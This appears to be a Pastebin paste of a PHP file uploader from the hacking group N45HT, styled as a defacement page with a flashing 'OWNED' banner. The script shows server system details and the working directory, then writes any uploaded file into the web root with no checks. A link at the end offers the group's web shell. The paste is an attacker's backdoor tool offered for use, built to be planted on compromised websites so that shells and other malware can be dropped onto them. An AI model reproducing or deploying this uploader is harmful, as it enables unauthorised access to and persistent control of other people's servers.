Advertisement
adit13

Uploader N45HT

Apr 13th, 2018
3,463
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.05 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html lang="en-US">
  3. <head>
  4.     <meta charset="UTF-8">
  5.     <title>N45HT</title>
  6. </head>
  7. <body background="http://4.bp.blogspot.com/-h1QH3MmXd4M/Uc64vsqmPeI/AAAAAAAAALs/Gi-fPnZ5V2Q/s1600/black+(11).jpg">
  8. <body>
  9. <script>
  10.     </script>
  11. </style>
  12.  
  13. <center><br><img src="https://3.bp.blogspot.com/-q8tKPJ6QVjI/WtC0TZlCZjI/AAAAAAAAAYo/cNXVL1sbntsXVkbk-Bc926QDx_KustzZACLcBGAs/s1600/N45HT%2B%25282%2529.png" width="400" height="350"><center>
  14. <body>
  15.  
  16. <font face= "Architects Daughter">
  17. <font color='red' face='Architects Daughter' font size="5px"'>N45HT Upl04d3r</font></b><center>
  18. <?php
  19. echo '<big><font color=white> System: <span style="color: lime;">'.php_uname().'</span></big><br>';
  20. echo "<font color=white>Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  21. echo '<big><font color=white>Directory: <span style="color: aqua;">'.getcwd().'</span></big><br><br>';
  22. echo "<form method='post' enctype='multipart/form-data'>
  23.       <input type='file' name='just_file'>
  24.       <input type='submit' name='upload' value='Upload!'>
  25.       </form>
  26.       </center>";
  27. $root = $_SERVER['DOCUMENT_ROOT'];
  28. $files = $_FILES['just_file']['name'];
  29. $dest = $root.'/'.$files;
  30. if(isset($_POST['upload'])) {
  31.     if(is_writable($root)) {
  32.         if(@copy($_FILES['just_file']['tmp_name'], $dest)) {
  33.             $web = "http://".$_SERVER['HTTP_HOST']."/";
  34.             echo "<font color='lime'sukses upload -> <a href='$web$files' target='_blank'><b><u>$web/$files</u></b></a>";
  35.         } else {
  36.             echo "<font color='red'gagal upload di document root.";
  37.         }
  38.     } else {
  39.         if(@copy($_FILES['just_file']['tmp_name'], $files)) {
  40.             echo " upload <b>$files</b> di folder ini";
  41.         } else {
  42.             echo "gagal upload";
  43.         }
  44.     }
  45. }
  46. ?>
  47. </body>
  48. <br>
  49. <br>
  50. <br>
  51. <style> .error { text-align: center; font-family: 'Gilda Display', serif; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; overflow: default; } .info { text-align: center; width: 200px; height: 60px; margin: auto; position: absolute; top: 280px; bottom: 0; left: 20px; right: 0; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; } .info:after { content: 'OWNED'; font-family: OCR-A; font-size: 100px; text-align: center; width: 800px; margin: auto; position: absolute; top: 20px; bottom: 0; left: 40px; right: 0; opacity: 0; color: white; -webkit-animation: noise-1 .2s linear infinite; animation: noise-1 .2s linear infinite; } @-webkit-keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @-webkit-keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @-webkit-keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @-webkit-keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } @keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } .wrap { top: 30%; left: 25%; height: 200px; margin-top: -100px; position: absolute; } code { color: white; } span.blue { color: #48beef; } span.comment { color: #7f8c8d; } span.orange { color: #f39c12; } span.green { color: #33cc33; } .viewFull { font-family:OCR-A; color:orange; text-decoration:; }    } @media only screen and (min-height: 500px) { .viewFull{ display:none;        } }     </style> <center> <style> img { filter:alpha(opacity=70); -moz-opacity:0.7; opacity:0.7; } img:hover { filter:alpha(opacity=100); -moz-opacity:.0; opacity:1.0; } </style>
  52. <a href='https://www.facebook.com/N45HTOfficial/' target='_blank'><font size='3px'>About Us</a> -
  53. <a href='https://n45ht.web.id/' target='_blank'><font size='3px'>Website</a>  -
  54. <a href='http://tool.n45ht.web.id/' target='_blank'><font size='3px'>Tools Online N45HT</a> -
  55. <a href='https://pastebin.com/dl/DxVJqctB' target='_blank'><font size='3px'>Download Shell N45HT</a>
  56. </body>
  57. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement